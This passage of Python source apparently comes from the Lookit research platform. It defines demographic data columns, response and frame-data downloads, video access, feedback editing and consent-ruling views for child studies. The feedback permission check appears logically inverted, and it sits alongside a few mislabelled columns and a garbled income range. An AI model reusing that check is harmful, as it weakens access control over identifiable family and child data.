"frame of this study. response_conditions.0.frameName is the frame ID (corresponding to a value in "
"response_sequence) where the randomization occurred. Additional fields such as "
"response_conditions.0.conditionNum depend on the specific randomizer frames used in this study."
),
extractor=lambda resp: [
{**{"frameName": cond_frame}, **conds}
for (cond_frame, conds) in resp.conditions.items()
],
),
]
# Columns for demographic data downloads. Extractor functions expect Response values dict,
# rather than instance.
DEMOGRAPHIC_COLUMNS = [
ResponseDataColumn(
id="response__uuid",
description=(
"Primary unique identifier for response. Can be used to match demographic data to response data "
"and video filenames; must be redacted prior to publication if videos are also published."
),
extractor=lambda resp: str(resp["uuid"]),
name="Response UUID",
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, "
"which may have unintended privacy consequences. Researchers can use this ID to match participants "
"across studies (subject to their own IRB review), but would need to generate their own random "
"participant IDs for publication in that case. Use participant__hashed_id as a publication-safe "
"alternative if only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp["child__user__uuid"]),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, but is unique to this study. This may be published "
"directly."
),
extractor=lambda resp: hash_participant_id(resp),
name="Participant ID",
),
ResponseDataColumn(
id="demographic__hashed_id",
description=(
"Identifier for this demographic snapshot. Changes upon updates to the demographic form, "
"so may vary within the same participant across responses."
),
extractor=lambda resp: hash_demographic_id(resp),
name="Demographic ID",
),
ResponseDataColumn(
id="demographic__date_created",
description=(
"Timestamp of creation of the demographic snapshot associated with this response, in format e.g. "
"2019-10-02 21:39:03.713283+00:00"
),
extractor=lambda resp: str(resp["demographic_snapshot__created_at"]),
name="Date created",
),
ResponseDataColumn(
id="demographic__number_of_children",
description="Response to 'How many children do you have?'; options 0-10 or >10 (More than 10)",
extractor=lambda resp: resp["demographic_snapshot__number_of_children"],
name="Number of children",
),
ResponseDataColumn(
id="demographic__child_rounded_ages",
description=(
"List of rounded ages based on child birthdays entered in demographic form (not based on children "
"registered). Ages are at time of response for this row, in days, rounded to nearest 10 for ages "
"under 1 year and nearest 30 otherwise. In format e.g. [60, 390]"
),
extractor=lambda resp: round_ages_from_birthdays(
resp["demographic_snapshot__child_birthdays"], resp["date_created"]
),
name="Child ages rounded",
),
ResponseDataColumn(
id="demographic__languages_spoken_at_home",
description="Freeform response to 'What language(s) does your family speak at home?'",
extractor=lambda resp: resp["demographic_snapshot__languages_spoken_at_home"],
name="Languages spoken at home",
),
ResponseDataColumn(
id="demographic__number_of_guardians",
description="Response to 'How many parents/guardians do your children live with?' - 1, 2, 3> [3 or more], varies",
extractor=lambda resp: resp["demographic_snapshot__number_of_guardians"],
name="Number of guardians",
),
ResponseDataColumn(
id="demographic__number_of_guardians_explanation",
description=(
"Freeform response to 'If the answer varies due to shared custody arrangements or travel, please "
"enter the number of parents/guardians your children are usually living with or explain.'"
),
extractor=lambda resp: resp[
"demographic_snapshot__number_of_guardians_explanation"
],
name="Number of guardians explanation",
),
ResponseDataColumn(
id="demographic__race_identification",
description=(
"Comma-separated list of all values checked for question 'What category(ies) does your family "
"identify as?', from list: White; Hispanic, Latino, or Spanish origin; Black or African American; "
"Asian; American Indian or Alaska Native; Middle Eastern or North African; Native Hawaiian or "
"Other Pacific Islander; Another race, ethnicity, or origin"
),
extractor=lambda resp: resp["demographic_snapshot__race_identification"],
name="Race",
),
ResponseDataColumn(
id="demographic__parent_age",
description=(
"Parent's response to question 'What is your age?'; options are <18, 18-21, 22-24, 25-29, 30-34, "
"35-39, 40-44, 45-49, 50s, 60s, >70"
),
extractor=lambda resp: resp["demographic_snapshot__age"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__parent_gender",
description=(
"Parent's response to question 'What is your gender?'; options are m [male], f [female], o "
"[other], na [prefer not to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__gender"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__education_level",
description=(
"Parent's response to question 'What is the highest level of education you've completed?'; options "
"are some [some or attending high school], hs [high school diploma or GED], col [some or attending "
"college], assoc [2-year college degree], bach [4-year college degree], grad [some or attending "
"graduate or professional school], prof [graduate or professional degree]"
),
extractor=lambda resp: resp["demographic_snapshot__education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__spouse_education_level",
description=(
"Parent's response to question 'What is the highest level of education your spouse has "
"completed?'; options are some [some or attending high school], hs [high school diploma or GED], "
"col [some or attending college], assoc [2-year college degree], bach [4-year college degree], "
"grad [some or attending graduate or professional school], prof [graduate or professional degree], "
"na [not applicable - no spouse or partner]"
),
extractor=lambda resp: resp["demographic_snapshot__spouse_education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__annual_income",
description=(
"Parent's response to question 'What is your approximate family yearly income (in US dollars)?'; "
"options are 0, 5000, 10000, 15000, 20000-19000 in increments of 10000, >200000, or na [prefer not "
"to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__annual_income"],
name="Annual income",
),
ResponseDataColumn(
id="demographic__number_of_books",
description="Parent's response to question 'About how many children's books are there in your home?'; integer",
extractor=lambda resp: resp["demographic_snapshot__number_of_books"],
name="Number of books",
),
ResponseDataColumn(
id="demographic__additional_comments",
description="Parent's freeform response to question 'Anything else you'd like us to know?'",
extractor=lambda resp: resp["demographic_snapshot__additional_comments"],
name="Additional comments",
),
ResponseDataColumn(
id="demographic__country",
description="Parent's response to question 'What country do you live in?'; 2-letter country code",
extractor=lambda resp: resp["demographic_snapshot__country"],
name="Country code",
),
ResponseDataColumn(
id="demographic__state",
description=(
"Parent's response to question 'What state do you live in?' if country is US; 2-letter state "
"abbreviation"
),
extractor=lambda resp: resp["demographic_snapshot__state"],
name="US State",
),
ResponseDataColumn(
id="demographic__density",
description=(
"Parent's response to question 'How would you describe the area where you live?'; options are "
"urban, suburban, rural"
),
extractor=lambda resp: resp["demographic_snapshot__density"],
name="Density",
),
ResponseDataColumn(
id="demographic__lookit_referrer",
description="Parent's freeform response to question 'How did you hear about Lookit?'",
extractor=lambda resp: resp["demographic_snapshot__lookit_referrer"],
name="How you heard about Lookit",
),
]
# Which headers from the response data summary should go in the child data downloads
CHILD_CSV_HEADERS = [
col.id
for col in RESPONSE_COLUMNS
if col.id.startswith("child__") or col.id.startswith("participant__")
]
IDENTIFIABLE_DATA_HEADERS = {col.id for col in RESPONSE_COLUMNS if col.identifiable}
def get_response_headers(
selected_header_ids: Union[Set, List],
all_available_header_ids: Union[Set, KeysView],
) -> List:
"""Get ordered list of response headers for download.
Select and order the appropriate headers to include in a file download, based on
which optional headers are selected and which headers are available.
Args:
selected_header_ids: which optional headers to include (corresponding to id values in
RESPONSE_COLUMNS). Headers that are specified as optional in RESPONSE_COLUMNS will
only be included if listed in selected_header_ids.
all_available_header_ids: all header ids we have data for. Any header ids that are in
this set but not in RESPONSE_COLUMNS will be added to the end of the output list.
Returns:
List of headers to include, consisting of the following in order:
1) Headers in RESPONSE_COLUMNS, in order, omitting any that are optional and were not selected
2) Extra headers from all_available_header_ids not included in (1), in alpha order
"""
unselected_optional_ids = {
col.id
for col in RESPONSE_COLUMNS
if col.optional and col.id not in selected_header_ids
}
selected_standard_header_ids = [
col.id
for col in RESPONSE_COLUMNS[0:-2]
if col.id not in unselected_optional_ids
]
return selected_standard_header_ids + sorted(
list(
all_available_header_ids
- set(selected_standard_header_ids)
- unselected_optional_ids
)
)
def get_demographic_headers(selected_header_ids=None) -> List[str]:
"""Get ordered list of demographic headers for download.
Args:
selected_header_ids(set or list): which optional headers to include (corresponding
to id values in DEMOGRAPHIC_COLUMNS).
Returns:
Ordered list of headers to include in download
Headers are id values from DEMOGRAPHIC_COLUMNS in order, omitting any that are optional
and were not included in selected_header_ids.
"""
if selected_header_ids is None:
selected_header_ids = {}
return [
col.id
for col in DEMOGRAPHIC_COLUMNS
if col.id in selected_header_ids or not col.optional
]
def construct_response_dictionary(
resp, columns, optional_headers, include_exp_data=True
):
if optional_headers is None:
optional_headers = {}
resp_dict = {}
for col in columns:
if col.id in optional_headers or not col.optional:
try:
object_name, field_name = col.id.split("__")
if object_name in resp_dict:
resp_dict[object_name][field_name] = col.extractor(resp)
else:
resp_dict[object_name] = {field_name: col.extractor(resp)}
except ValueError:
resp_dict[col.id] = col.extractor(resp)
# Include exp_data field in dictionary?
if include_exp_data:
resp_dict["exp_data"] = resp.exp_data
return resp_dict
class FrameDataRow(NamedTuple):
response_uuid: str
child_hashed_id: str
frame_id: str
event_number: str
key: str
value: str
FRAME_DATA_HEADER_DESCRIPTIONS = {
"response_uuid": "Unique identifier for this response; can be matched to summary data and video filenames",
"child_hashed_id": (
"Hashed identifier for the child associated with this response; can be matched to summary data "
"child_hashed_id. This random ID may be published directly; it is specific to this study. If you "
"need to match children across multiple studies, use the child_global_id."
),
"frame_id": (
"Identifier for the particular frame responsible for this data; matches up to an element in the "
"response_sequence in the summary data file"
),
"event_number": (
"Index of the event responsible for this data, if this is an event. Indexes start from 0 within each "
"frame (and within global data) within each response. Blank for non-event data."
),
"key": "Label for a piece of data collected during this frame - for example, 'formData.child_favorite_animal'",
"value": "Value of the data associated with this key (of the indexed event if applicable) - for example, 'giraffe'",
}
def get_frame_data(resp: Union[Response, Dict]) -> List[FrameDataRow]:
"""Get list of data stored in response's exp_data and global_event_timings fields.
Args:
resp(Response or dict): response data to process. If dict, must contain fields
child__uuid, study__uuid, study__salt, study__hash_digits, uuid, exp_data, and
global_event_timings.
Returns:
List of FrameDataRows each representing a single piece of data from global_event_timings or
exp_data. Descriptions of each field of the FrameDataRow are given in FRAME_DATA_HEADER_DESCRIPTIONS.
"""
if type(resp) is not dict:
resp = {
"child__uuid": resp.child.uuid,
"study__uuid": resp.study.uuid,
"study__salt": resp.study.salt,
"study__hash_digits": resp.study.hash_digits,
"uuid": resp.uuid,
"exp_data": resp.exp_data,
"global_event_timings": resp.global_event_timings,
}
frame_data_tuples = []
child_hashed_id = hash_id(
resp["child__uuid"],
resp["study__uuid"],
resp["study__salt"],
resp["study__hash_digits"],
)
# First add all of the global event timings as events with frame_id "global"
for (iEvent, event) in enumerate(resp["global_event_timings"]):
for (key, value) in event.items():
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id="global",
key=key,
event_number=str(iEvent),
value=value,
)
)
# Next add all data in exp_data
event_prefix = "eventTimings."
for frame_id, frame_data in resp["exp_data"].items():
for (key, value) in flatten_dict(frame_data).items():
# Process event data separately and include event_number within frame
if key.startswith(event_prefix):
key_pieces = key.split(".")
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=".".join(key_pieces[2:]),
event_number=str(key_pieces[1]),
value=value,
)
)
# omit frameType values from CSV
elif key == "frameType":
continue
# Omit the DOB from any exit survey
elif key == "birthDate" and frame_data.get("frameType", None) == "EXIT":
continue
# Omit empty generatedProperties values from CSV
elif key == "generatedProperties" and not value:
continue
# For all other data, create a regular entry with frame_id and no event #
else:
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=key,
event_number="",
value=value,
)
)
return frame_data_tuples
def build_framedata_dict_csv(writer, responses):
response_paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
unique_frame_ids = set()
event_keys = set()
unique_frame_keys_dict = {}
for page_num in response_paginator.page_range:
page_of_responses = response_paginator.page(page_num)
for resp in page_of_responses:
this_resp_data = get_frame_data(resp)
these_ids = {
d.frame_id.partition("-")[2]
for d in this_resp_data
if not d.frame_id == "global"
}
event_keys = event_keys | {
d.key for d in this_resp_data if d.event_number != ""
}
unique_frame_ids = unique_frame_ids | these_ids
for frame_id in these_ids:
these_keys = {
d.key
for d in this_resp_data
if d.frame_id.partition("-")[2] == frame_id and d.event_number == ""
}
if frame_id in unique_frame_keys_dict:
unique_frame_keys_dict[frame_id] = (
unique_frame_keys_dict[frame_id] | these_keys
)
else:
unique_frame_keys_dict[frame_id] = these_keys
# Start with general descriptions of high-level headers (child_id, response_id, etc.)
writer.writerows(
[
{"column": header, "description": description}
for (header, description) in FRAME_DATA_HEADER_DESCRIPTIONS.items()
]
)
writer.writerow(
{
"possible_frame_id": "global",
"frame_description": "Data not associated with a particular frame",
}
)
# Add placeholders to describe each frame type
unique_frame_ids = sorted(list(unique_frame_ids))
for frame_id in unique_frame_ids:
writer.writerow(
{
"possible_frame_id": "*-" + frame_id,
"frame_description": "RESEARCHER: INSERT FRAME DESCRIPTION",
}
)
unique_frame_keys = sorted(list(unique_frame_keys_dict[frame_id]))
for k in unique_frame_keys:
writer.writerow(
{
"possible_frame_id": "*-" + frame_id,
"possible_key": k,
"key_description": "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS KEY MEANS IN THIS FRAME",
}
)
event_keys = sorted(list(event_keys))
event_key_stock_descriptions = {
"eventType": (
"Descriptor for this event; determines what other data is available. Global event 'exitEarly' records "
"cases where the participant attempted to exit the study early by closing the tab/window or pressing F1 "
"or ctrl-X. RESEARCHER: INSERT DESCRIPTIONS OF PARTICULAR EVENTTYPES USED IN YOUR STUDY. (Note: you can "
"find a list of events recorded by each frame in the frame documentation at "
"https://lookit.github.io/ember-lookit-frameplayer, under the Events header.)"
),
"exitType": (
"Used in the global event exitEarly. Only value stored at this point is 'browserNavigationAttempt'"
),
"lastPageSeen": (
"Used in the global event exitEarly. Index of the frame the participant was on before exit attempt."
),
"pipeId": (
"Recorded by any event in a video-capture-equipped frame. Internal video ID used by Pipe service; only "
"useful for troubleshooting in rare cases."
),
"streamTime": (
"Recorded by any event in a video-capture-equipped frame. Indicates time within webcam "
"video (videoId) to nearest 0.1 second. If recording has not started yet, may be 0 or null."
),
"timestamp": "Recorded by all events. Timestamp of event in format e.g. 2019-11-07T17:14:43.626Z",
"videoId": (
"Recorded by any event in a video-capture-equipped frame. Filename (without .mp4 extension) of video "
"currently being recorded."
),
}
for k in event_keys:
writer.writerow(
{
"possible_frame_id": "any (event data)",
"possible_key": k,
"key_description": event_key_stock_descriptions.get(
k, "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS EVENT KEY MEANS"
),
}
)
def build_single_response_framedata_csv(response):
"""
Builds CSV file contents for frame-level data from a single response. Used for both
building zip archive of all response data & offering individual-file downloads on individual responses view.
"""
this_resp_data = get_frame_data(response)
output, writer = csv_namedtuple_writer(FrameDataRow)
writer.writerows(this_resp_data)
return output.getvalue()
class ResponseDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
model = Response
paginate_by = 10
ordering = "id"
def get_queryset(self):
study = self.study
return study.responses_for_researcher(self.request.user).order_by(
self.get_ordering()
)
class DemographicDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
model = Response
paginate_by = 10
ordering = "id"
def get_queryset(self):
study = self.study
return (
study.responses_for_researcher(self.request.user)
.order_by(self.get_ordering())
.select_related("child", "child__user", "study", "demographic_snapshot")
.values(
"uuid",
"date_created",
"child__user__uuid",
"study__uuid",
"study__salt",
"study__hash_digits",
"demographic_snapshot__uuid",
"demographic_snapshot__created_at",
"demographic_snapshot__number_of_children",
"demographic_snapshot__child_birthdays",
"demographic_snapshot__languages_spoken_at_home",
"demographic_snapshot__number_of_guardians",
"demographic_snapshot__number_of_guardians_explanation",
"demographic_snapshot__race_identification",
"demographic_snapshot__age",
"demographic_snapshot__gender",
"demographic_snapshot__education_level",
"demographic_snapshot__spouse_education_level",
"demographic_snapshot__annual_income",
"demographic_snapshot__number_of_books",
"demographic_snapshot__additional_comments",
"demographic_snapshot__country",
"demographic_snapshot__state",
"demographic_snapshot__density",
"demographic_snapshot__lookit_referrer",
"demographic_snapshot__extra",
)
)
class StudyResponsesList(ResponseDownloadMixin, generic.ListView):
"""
View to display a list of study responses.
"""
template_name = "studies/study_responses.html"
def get_ordering(self):
"""
Determine sort field and order. Sorting on id actually sorts on child id, not response id.
Sorting on status, actually sorts on 'completed' field, where we are alphabetizing
"in progress" and "completed"
"""
orderby = self.request.GET.get("sort", "id")
return orderby.replace("id", "child__id").replace("status", "completed")
def get_queryset(self):
return (
super()
.get_queryset()
.prefetch_related(
"consent_rulings__arbiter",
Prefetch(
"feedback",
queryset=Feedback.objects.select_related("researcher").order_by(
"-id"
),
),
)
)
def get_context_data(self, **kwargs):
"""
In addition to the study, adds several items to the context dictionary. Study results
are paginated.
"""
context = super().get_context_data(**kwargs)
context["study"] = study = self.study
paginated_responses = context["object_list"]
columns_included_in_summary = study.columns_included_in_summary()
columns_included_in_table = [
"child__hashed_id",
"response__uuid",
"response__id",
"response__status",
"response__completed",
"response__is_preview",
]
response_data = []
for resp in paginated_responses:
# Info needed for table display of individual responses
this_resp_data = {
col.id: col.extractor(resp)
for col in RESPONSE_COLUMNS
if col.id in columns_included_in_table
}
# Exception - store actual date object for date created
this_resp_data["response__date_created"] = resp.date_created
# info needed for summary table shown at right
this_resp_data["summary"] = [
{
"name": col.name,
"value": col.extractor(resp),
"description": col.description,
}
for col in RESPONSE_COLUMNS
if col.id in columns_included_in_summary
]
this_resp_data["videos"] = resp.videos.values("pk", "full_name")
for v in this_resp_data["videos"]:
v["display_name"] = (
v["full_name"]
.replace("videoStream_{}_".format(study.uuid), "...")
.replace("_{}_".format(resp.uuid), "...")
)
response_data.append(this_resp_data)
context["response_data"] = response_data
context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
context["can_edit_feedback"] = self.request.user.has_study_perms(
StudyPermission.EDIT_STUDY_FEEDBACK, context["study"]
)
return context
def build_video_display_name(self, study_uuid, response_uuid, vid_name):
"""
Strips study_uuid and response_uuid out of video responses titles for better display.
"""
return ". . ." + ". . .".join(
vid_name.split(study_uuid + "_")[1].split("_" + response_uuid + "_")
)
class StudySingleResponseDownload(ResponseDownloadMixin, View):
"""
Download a single study response in the selected format with selected headers.
"""
def get(self, *args, **kwargs):
data_type = self.request.GET.get("data-type-selector", None)
if data_type not in ["json", "csv", "framedata"]:
raise SuspiciousOperation
response_id = self.request.GET.get("response_id", None)
try:
resp = self.get_queryset().get(pk=response_id)
except ObjectDoesNotExist:
raise SuspiciousOperation
study = self.study
header_options = set(self.request.GET.getlist("data_options"))
extension = "json" if data_type == "json" else "csv"
filename = "{}_{}{}.{}".format(
study_name_for_files(study.name),
str(resp.uuid),
"_frames"
if data_type == "json"
else "_identifiable"
if IDENTIFIABLE_DATA_HEADERS & header_options
else "",
extension,
)
if data_type == "json":
cleaned_data = json.dumps(
construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
indent="\t",
default=str,
)
elif data_type == "csv":
row_data = flatten_dict(
{col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
)
header_list = get_response_headers(header_options, row_data.keys())
output, writer = csv_dict_output_and_writer(header_list)
writer.writerow(row_data)
cleaned_data = output.getvalue()
elif data_type == "framedata":
cleaned_data = build_single_response_framedata_csv(resp)
else:
raise SuspiciousOperation
response = HttpResponse(cleaned_data, content_type="text/{}".format(extension))
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponseVideoAttachment(
ResearcherLoginRequiredMixin, UserPassesTestMixin, StudyLookupMixin, View
):
"""
View that redirects to a requested video for a study response.
"""
raise_exception = True
@cached_property
def video(self):
# Only select the video from consented videos for this study
return self.study.videos_for_consented_responses.get(
pk=self.kwargs.get("video")
)
def can_view_this_video(self):
user = self.request.user
study = self.study
video = self.video
return user.is_researcher and (
(
user.has_study_perms(StudyPermission.READ_STUDY_RESPONSE_DATA, study)
and not video.response.is_preview
)
or (
user.has_study_perms(StudyPermission.READ_STUDY_PREVIEW_DATA, study)
and video.response.is_preview
)
)
test_func = can_view_this_video
def get(self, request, *args, **kwargs):
video = self.video
download_url = video.download_url
if self.request.GET.get("mode") == "download":
r = requests.get(download_url)
response = FileResponse(
File.open(io.BytesIO(r.content)),
filename=video.filename,
as_attachment=True,
)
return response
return redirect(download_url)
class StudyResponseSubmitFeedback(StudyLookupMixin, UserPassesTestMixin, View):
"""
View to create or edit response feedback.
"""
def user_can_edit_feedback(self):
user = self.request.user
study = self.study
# First check user has permission to be editing feedback from this study at all
if not user.is_researcher and user.has_study_perms(
StudyPermission.EDIT_STUDY_FEEDBACK, study
):
return False
# Check that the feedback_id (if given) is from this study
feedback_id = self.request.POST.get("feedback_id", None)
if feedback_id:
try:
feedback = Feedback.objects.get(id=feedback_id)
except ObjectDoesNotExist:
return False
if feedback.response.study_id != study.pk:
return False
# Check that the response_id (if given) is from this study
response_id = self.request.POST.get("response_id", None)
if response_id:
try:
response = Response.objects.get(id=int(response_id))
except ObjectDoesNotExist:
return False
if response.study_id != study.pk:
return False
return True
test_func = user_can_edit_feedback
def post(self, request, *args, **kwargs):
"""
Create or edit feedback. Pass feedback_id to edit existing feedback, or response_id to create new
feedback for that response.
"""
form_data = self.request.POST
user = self.request.user
study = self.study
feedback_id = form_data.get("feedback_id", None)
comment = form_data.get("comment", "")
if feedback_id:
Feedback.objects.filter(id=feedback_id).update(comment=comment)
else:
response_id = int(form_data.get("response_id"))
Feedback.objects.create(
response_id=response_id, researcher=user, comment=comment
)
return HttpResponseRedirect(
reverse("exp:study-responses-list", kwargs=dict(pk=study.pk))
)
class StudyResponsesConsentManager(
ResearcherLoginRequiredMixin,
UserPassesTestMixin,
SingleObjectFetchProtocol[Study],
generic.DetailView,
):
"""Manage consent videos from here: approve or reject as evidence of informed consent."""
template_name = "studies/study_responses_consent_ruling.html"
queryset = Study.objects.all()
raise_exception = True
def user_can_code_consent(self):
user = self.request.user
study = self.get_object()
return user.is_researcher and (
user.has_study_perms(StudyPermission.CODE_STUDY_CONSENT, study)
or user.has_study_perms(StudyPermission.CODE_STUDY_PREVIEW_CONSENT, study)
)
test_func = user_can_code_consent
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# Need to prefetch our responses with consent-footage videos.
study = context["study"]
# TODO: technically should not grant access to consent videos for preview data unless has that perm
# (or should clearly indicate that code_study_consent means preview + actual data)
preview_only = not self.request.user.has_study_perms(
StudyPermission.CODE_STUDY_CONSENT, study
)
responses = get_responses_with_current_rulings_and_videos(
study.id, preview_only
)
context["loaded_responses"] = responses
context["summary_statistics"] = get_consent_statistics(study.id, preview_only)
# Using a map for arbitrarily structured data - lists and objects that we can't just trivially shove onto
# data-* properties in HTML
response_key_value_store = {}
paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
# two jobs - generate statistics and populate k/v store.
for response in page_of_responses:
response_json = response_key_value_store[str(response["uuid"])] = {}
response["uuid"] = str(response.pop("uuid"))
response_json["videos"] = response.pop("videos")
response_json["details"] = {
"general": {
"uuid": response["uuid"],
"global_event_timings": json.dumps(
response.pop("global_event_timings")
),
"sequence": json.dumps(response.pop("sequence")),
"completed": json.dumps(response.pop("completed")),
"date_created": str(response["date_created"]),
},
"participant": {
"hashed_id": hash_participant_id(response),
"uuid": str(response.pop("child__user__uuid")),
"nickname": response.pop("child__user__nickname"),
},
"child": {
"hashed_id": hash_child_id(response),
"uuid": str(response.pop("child__uuid")),
"name": response.pop("child__given_name"),
"birthday": str(response.pop("child__birthday")),
"gender": response.pop("child__gender"),
"additional_information": response.pop(
"child__additional_information"
),
},
}
# TODO: Use json_script template tag to create JSON that can be used in Javascript
# (see https://docs.djangoproject.com/en/3.0/ref/templates/builtins/#json-script)
context["response_key_value_store"] = json.dumps(response_key_value_store)
return context
def post(self, request, *args, **kwargs):
"""This is where consent rulings are submitted."""
form_data = self.request.POST
user = self.request.user
study = self.get_object()
preview_only = not self.request.user.has_study_perms(
StudyPermission.CODE_STUDY_CONSENT, study
)
# Only allow any action on preview responses unless full perms
responses = study.responses
if preview_only:
responses = responses.filter(is_preview=True)
comments = json.loads(form_data.get("comments"))
# We now accept pending rulings to reverse old reject/approve decisions.
for ruling in ("accepted", "rejected", "pending"):
judged_responses = responses.filter(uuid__in=form_data.getlist(ruling))
for response in judged_responses:
response.consent_rulings.create(
action=ruling,
arbiter=user,
comments=comments.pop(str(response.uuid), None),
)
response.save()
# if there are any comments left over, these will count as new rulings that are the same as the last.
if comments:
for resp_uuid, comment in comments.items():
response = responses.get(uuid=resp_uuid)
response.consent_rulings.create(
action=response.most_recent_ruling, arbiter=user, comments=comment
)
return HttpResponseRedirect(
reverse(
"exp:study-responses-consent-manager",
kwargs=dict(pk=self.get_object().pk),
)
)
def get(self, request, *args, **kwargs):
if self.get_object().study_type.is_external:
messages.error(request, "There is no consent manager for external studies.")
return HttpResponseRedirect(reverse("exp:study-detail", kwargs=kwargs))
else:
return super().get(request, *args, **kwargs)
class StudyResponsesAll(
CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
"""
StudyResponsesAll shows a variety of download options for response and child data
from a given study. (It does not actually show any data.)
"""
template_name = "studies/study_responses_all.html"
queryset = Study.objects.all()
http_method_names = ["get"]
def get_context_data(self, **kwargs):
"""
In addition to the study, adds several items to the context dictionary.
"""
context = super().get_context_data(**kwargs)
context["n_responses"] = (
context["study"].responses_for_researcher(self.request.user).count()
)
context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
context["can_delete_preview_data"] = self.request.user.has_study_perms(
StudyPermission.DELETE_ALL_PREVIEW_DATA, context["study"]
)
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
return context
class StudyDeletePreviewResponses(
ResearcherLoginRequiredMixin,
UserPassesTestMixin,
SingleObjectFetchProtocol[Study],
SingleObjectMixin,
View,
):
queryset = Study.objects.all()
def user_can_delete_preview_data(self):
user = self.request.user
study = self.get_object()
return user.is_researcher and user.has_study_perms(
StudyPermission.DELETE_ALL_PREVIEW_DATA, study
)
test_func = user_can_delete_preview_data
def post(self, request, *args, **kwargs):
"""
Post method on all responses view handles the 'delete all preview data' button.
"""
study = self.get_object()
# Note: delete all, not just consented!
preview_responses = study.responses.filter(is_preview=True).prefetch_related(
"videos", "responselog_set", "consent_rulings", "feedback"
)
paginator = Paginator(preview_responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
# response logs, consent rulings, feedback, videos will all be deleted
# via cascades - videos will be removed from S3 also on pre_delete hook
resp.delete()
return HttpResponseRedirect(
reverse("exp:study-responses-all", kwargs={"pk": study.id})
)
class StudyResponsesJSON(ResponseDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads all study responses in JSON format.
"""
# Smaller pagination because individual responses may be large and we don't want the json representing 100
# responses in memory
paginate_by = 1
def make_chunk(self, paginator, page_num, header_options):
chunk = ""
if page_num == 1:
chunk = "[\n"
chunk += ",\n".join(
json.dumps(
construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
indent="\t", # Use tab rather than spaces to make file smaller (ex. 60MB -> 25MB)
default=str,
)
for resp in paginator.page(page_num)
)
if page_num == paginator.page_range[-1]:
chunk += "\n]"
else:
chunk += ",\n"
return chunk
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
header_options = set(self.request.GET.getlist("data_options"))
filename = "{}_{}.json".format(
study_name_for_files(study.name),
"all-responses"
+ ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
)
response = StreamingHttpResponse(
(
self.make_chunk(paginator, page_num, header_options)
for page_num in paginator.page_range
),
content_type="text/json",
)
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesCSV(ResponseDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads a summary of all study responses in CSV format.
"""
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
headers = set()
session_list = []
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = flatten_dict(
{col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
)
# Add any new headers from this session
headers = headers | row_data.keys()
session_list.append(row_data)
header_options = set(self.request.GET.getlist("data_options"))
header_list = get_response_headers(header_options, headers)
output, writer = csv_dict_output_and_writer(header_list)
writer.writerows(session_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name),
"all-responses"
+ ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesDictCSV(CanViewStudyResponsesMixin, View):
"""
Hitting this URL downloads a data dictionary for the study response summary in CSV format. Does not depend on actual response data.
"""
def build_summary_dict_csv(self, optional_headers_selected_ids):
"""
Builds CSV file contents for data dictionary corresponding to the overview CSV
"""
descriptions = {col.id: col.description for col in RESPONSE_COLUMNS}
header_list = get_response_headers(
optional_headers_selected_ids, descriptions.keys()
)
all_descriptions = [
{"column": header, "description": descriptions[header]}
for header in header_list
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
return output.getvalue()
def get(self, request, *args, **kwargs):
study = self.study
header_options = self.request.GET.getlist("data_options")
